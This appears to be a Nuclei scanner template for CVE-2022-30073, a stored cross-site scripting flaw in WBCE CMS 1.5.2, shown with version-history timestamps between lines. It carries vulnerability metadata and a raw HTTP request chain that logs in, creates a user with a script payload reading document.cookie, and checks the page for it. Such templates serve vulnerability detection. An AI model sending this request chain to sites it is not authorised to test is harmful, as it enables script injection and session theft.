2022-07-16 08:25:17 +00:00
id : CVE-2022-30073
info :
2022-09-16 19:50:10 +00:00
name : WBCE CMS 1.5.2 - Cross-Site Scripting
2022-07-16 08:25:17 +00:00
author : arafatansari
2022-09-16 20:03:07 +00:00
severity : medium
2022-07-16 08:25:17 +00:00
description : |
2022-09-16 19:50:10 +00:00
WBCE CMS 1.5.2 contains a stored cross-site scripting vulnerability via \admin\user\save.php Display Name parameters.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade to a patched version of WBCE CMS or apply the vendor-supplied patch to mitigate this vulnerability.
2022-07-16 08:25:17 +00:00
reference :
- https://github.com/APTX-4879/CVE
2022-07-22 07:23:08 +00:00
- https://github.com/APTX-4879/CVE/blob/main/CVE-2022-30073.pdf
2022-09-16 19:50:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-30073
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2022-07-22 07:23:08 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-30073
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2023-12-12 11:07:52 +00:00
epss-score : 0.00205
2024-05-31 19:23:20 +00:00
epss-percentile : 0.5842
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:*
2022-07-16 08:25:17 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 4
2023-07-11 19:49:27 +00:00
vendor : wbce
product : wbce_cms
2024-01-14 09:21:50 +00:00
tags : cve2022,cve,wbcecms,xss,wbce
2022-07-16 08:25:17 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-19 11:52:28 +00:00
- raw :
2022-07-16 08:25:17 +00:00
- |
2022-07-19 11:37:35 +00:00
POST /admin/login/index.php HTTP/1.1
2022-07-16 08:25:17 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-07-19 11:37:35 +00:00
url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login
2022-07-16 08:25:17 +00:00
- |
2022-07-19 11:37:35 +00:00
GET /admin/users/index.php HTTP/1.1
Host : {{Hostname}}
2022-07-16 08:25:17 +00:00
- |
2022-07-19 11:37:35 +00:00
POST /admin/users/index.php HTTP/1.1
2022-07-16 08:25:17 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-07-19 11:37:35 +00:00
formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
2022-07-16 08:25:17 +00:00
- |
2022-07-19 11:37:35 +00:00
GET /admin/users/index.php HTTP/1.1
2022-07-16 08:25:17 +00:00
Host : {{Hostname}}
2022-07-19 11:52:28 +00:00
2022-07-16 08:25:17 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-07-19 11:37:35 +00:00
- "<p><b><script>alert(document.cookie)</script>"
- "WBCECMS"
condition : and
2022-07-19 11:52:28 +00:00
2022-07-16 08:25:17 +00:00
- type : word
part : header
words :
- text/html
2022-07-19 11:52:28 +00:00
2022-07-16 08:25:17 +00:00
- type : status
status :
- 200
2023-07-11 19:49:27 +00:00
extractors :
- type : regex
name : formtoken
group : 1
regex :
- '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'
internal : true
part : body
2024-03-25 11:57:16 +00:00
# digest: 4a0a00473045022008a3770822e57b09d41ac02e4e8fb24a8d4ae12e02479ea7fba6c5a50919789a022100e7d5afd4414fd130081f474df96ee4a0f3b609a7d5e683b618acba7031af8323:922c64590222798bb761d5b6d8e72950